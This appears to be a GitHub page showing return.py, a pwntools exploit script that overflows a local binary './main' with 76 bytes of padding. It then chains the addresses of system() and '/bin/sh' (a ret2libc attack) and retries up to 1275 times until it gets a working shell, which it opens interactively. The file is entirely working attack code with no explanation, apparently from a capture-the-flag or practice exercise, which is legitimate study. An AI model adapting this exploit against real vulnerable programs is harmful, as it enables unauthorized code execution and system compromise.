-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathreturn.py
44 lines (36 loc) · 1000 Bytes
/
return.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#!/usr/bin/env python
from pwn import *
import time
import locations
def hexify(hex_number):
return chr(int("0x" + hex_number,16))
def reverse(add):
stack = []
for x in range(0,4):
stack.append(hexify(add[2+x*2:4+x*2:]))
r = ''
for x in range(0,4):
r += stack.pop()
return r
system_address = reverse(locations.system)
binbash_address = reverse(locations.binbash)
bad_words = ['glibc','stack smashing','Assertion']
for x in range(0,255*5):
io = process('./main')
padding = "A"*76
exploit = padding + system_address + "A"*4 + binbash_address
io.sendline(exploit)
io.sendline("ls")
buff = io.recvline()
buff = io.recvline()
if io.can_recv():
a = io.recvline()
print("A", a)
found_bad_word = False
for bad_word in bad_words:
if bad_word in a:
found_bad_word = True
if found_bad_word is False:
io.interactive()
break
io.close()